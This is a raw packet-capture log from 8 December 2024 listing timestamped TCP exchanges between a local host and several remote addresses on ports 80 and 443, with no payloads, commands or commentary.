Dec 8, 2024 13:31:23.589430094 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.590025902 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.590178967 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.590233088 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.590279102 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.591015100 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.591106892 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.591131926 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.591207027 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.592187881 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.592247009 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.592314005 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.592447042 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.592998028 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.593095064 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.593122005 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.593969107 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.593991041 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.594039917 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.594063997 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.594396114 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.594978094 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.595081091 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.595138073 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.595138073 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.595973969 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.596092939 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.596105099 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.596183062 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.596978903 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.597110033 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.597352982 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.598006964 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.598057032 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.598083019 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.598217964 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.598931074 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.599036932 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.599127054 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.599936008 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.600054026 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.600363016 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.601314068 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.601352930 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.601443052 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.601907015 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.602020979 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.602051020 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.602149963 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.602921009 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.603023052 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.603125095 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.603893042 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.603967905 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.603995085 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.604907036 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.605135918 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.605164051 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.605241060 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.605878115 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.605930090 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.605953932 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.606048107 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.606903076 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.610047102 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.630929947 CET	443	49745	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.630948067 CET	443	49745	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.631176949 CET	49745	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.631186008 CET	443	49745	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.631252050 CET	49745	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.631963968 CET	443	49744	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.631993055 CET	443	49744	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.632091045 CET	49744	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.632091999 CET	49744	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.632108927 CET	443	49744	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.632213116 CET	49744	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.642404079 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.642524958 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.642551899 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.642930984 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.642986059 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.643011093 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.643222094 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.644069910 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.644114971 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.644139051 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.644994974 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.645092010 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.645172119 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.645365000 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.645951033 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.645962954 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.646018028 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.646872044 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.646980047 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.646998882 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.647870064 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.647998095 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.648026943 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.648176908 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.648866892 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.649015903 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.649019003 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.649116993 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.649852991 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.649951935 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.649985075 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.650075912 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.650922060 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.651005983 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.651109934 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.651832104 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.651945114 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.651972055 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.652816057 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.652957916 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.652987003 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.653106928 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.653862000 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.654014111 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.654031038 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.654105902 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.654808044 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.654903889 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.654913902 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.654992104 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.655802965 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.655884981 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.655934095 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.655975103 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.656801939 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.656876087 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.656899929 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.657186031 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.662955046 CET	443	49744	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.662974119 CET	443	49744	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.663086891 CET	49744	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.663088083 CET	49744	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.663108110 CET	443	49744	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.666058064 CET	49744	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.675559044 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.675578117 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.675640106 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.675664902 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.675714970 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.675743103 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.684209108 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.684226036 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.684353113 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.684364080 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.684484005 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.688119888 CET	443	49744	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.688138962 CET	443	49744	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.688275099 CET	49744	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.688290119 CET	443	49744	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.688441992 CET	49744	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.693399906 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.693416119 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.693536997 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.693536997 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.693550110 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.693708897 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.701395035 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.701412916 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.701602936 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.701615095 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.701677084 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.705899000 CET	443	49744	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.705915928 CET	443	49744	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.706033945 CET	49744	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.706046104 CET	443	49744	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.706347942 CET	49744	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.710707903 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.710726023 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.710865021 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.710874081 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.710947990 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.719232082 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.719254971 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.719450951 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.719460964 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.722397089 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.728483915 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.728499889 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.728640079 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.728652000 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.728815079 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.754807949 CET	443	49745	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.754832983 CET	443	49745	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.754888058 CET	49745	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.754899979 CET	443	49745	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.754949093 CET	49745	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.754949093 CET	49745	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.766057968 CET	49753	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.766107082 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.770034075 CET	49753	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.770138025 CET	49753	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.770150900 CET	443	49753	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.772804022 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.772831917 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.772846937 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.773024082 CET	49746	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.773042917 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.773189068 CET	49746	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.788193941 CET	443	49745	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.788211107 CET	443	49745	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.788331985 CET	49745	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.788341045 CET	443	49745	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.788465023 CET	49745	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.788960934 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.788992882 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.789072037 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.789072037 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.789089918 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.789329052 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.812176943 CET	443	49745	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.812195063 CET	443	49745	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.812304020 CET	49745	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.812313080 CET	443	49745	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.812412024 CET	49745	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.818073988 CET	443	49744	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.818114042 CET	443	49744	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.818130016 CET	49744	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.818145990 CET	443	49744	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.818172932 CET	49744	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.818186998 CET	49744	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.834429026 CET	443	49744	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.834446907 CET	443	49744	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.834481001 CET	49744	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.834496975 CET	443	49744	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.834526062 CET	49744	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.834546089 CET	49744	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.847511053 CET	443	49744	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.847527027 CET	443	49744	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.847573996 CET	49744	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.847590923 CET	443	49744	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.847635031 CET	49744	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.861881971 CET	443	49744	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.861900091 CET	443	49744	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.862283945 CET	49744	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.862298965 CET	443	49744	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.862442970 CET	49744	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.870064974 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.870085955 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.870269060 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.870285034 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.870326996 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.876548052 CET	443	49744	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.876564980 CET	443	49744	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.876780033 CET	443	49747	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:23.876791954 CET	49744	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.876808882 CET	443	49744	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.876861095 CET	49744	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.877157927 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.877176046 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.877491951 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.877501965 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.877547026 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.879339933 CET	49747	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:23.879357100 CET	443	49747	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:23.879976034 CET	49747	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:23.879980087 CET	443	49747	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:23.883138895 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.883155107 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.883213043 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.883222103 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.883277893 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.884984970 CET	443	49748	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:23.885401964 CET	49748	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:23.885416031 CET	443	49748	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:23.885586977 CET	443	49750	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:23.885818005 CET	49748	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:23.885823011 CET	443	49748	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:23.885948896 CET	49750	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:23.885966063 CET	443	49750	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:23.886327982 CET	49750	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:23.886333942 CET	443	49750	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:23.889691114 CET	443	49749	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:23.890068054 CET	49749	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:23.890088081 CET	443	49749	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:23.890101910 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.890110970 CET	443	49744	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.890115976 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.890127897 CET	443	49744	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.890199900 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.890207052 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.890234947 CET	49744	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.890244961 CET	443	49744	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.890265942 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.890269995 CET	49744	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.890291929 CET	49744	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.890479088 CET	49749	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:23.890482903 CET	443	49749	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:23.897078037 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.897094965 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.897207022 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.897217989 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.897254944 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.903594971 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.903611898 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.903676033 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.903690100 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.903740883 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.904689074 CET	443	49744	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.904716015 CET	443	49744	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.904776096 CET	49744	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.904789925 CET	443	49744	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.904833078 CET	49744	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.910697937 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.910721064 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.911077976 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.911088943 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.911138058 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.930792093 CET	443	49745	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.930818081 CET	443	49745	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.930864096 CET	49745	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.930879116 CET	443	49745	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.930907011 CET	49745	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.930931091 CET	49745	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.948550940 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.948575974 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.948617935 CET	443	49745	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.948652983 CET	49746	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.948654890 CET	443	49745	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.948664904 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.948725939 CET	49746	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.948730946 CET	49745	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.948736906 CET	443	49745	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.948781967 CET	49745	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.966204882 CET	443	49745	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.966228008 CET	443	49745	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.966272116 CET	49745	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.966278076 CET	443	49745	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.966320038 CET	49745	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.966345072 CET	49745	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.980603933 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.980623007 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.980674982 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.980690002 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.980721951 CET	49742	443	192.168.2.6	150.171.27.10
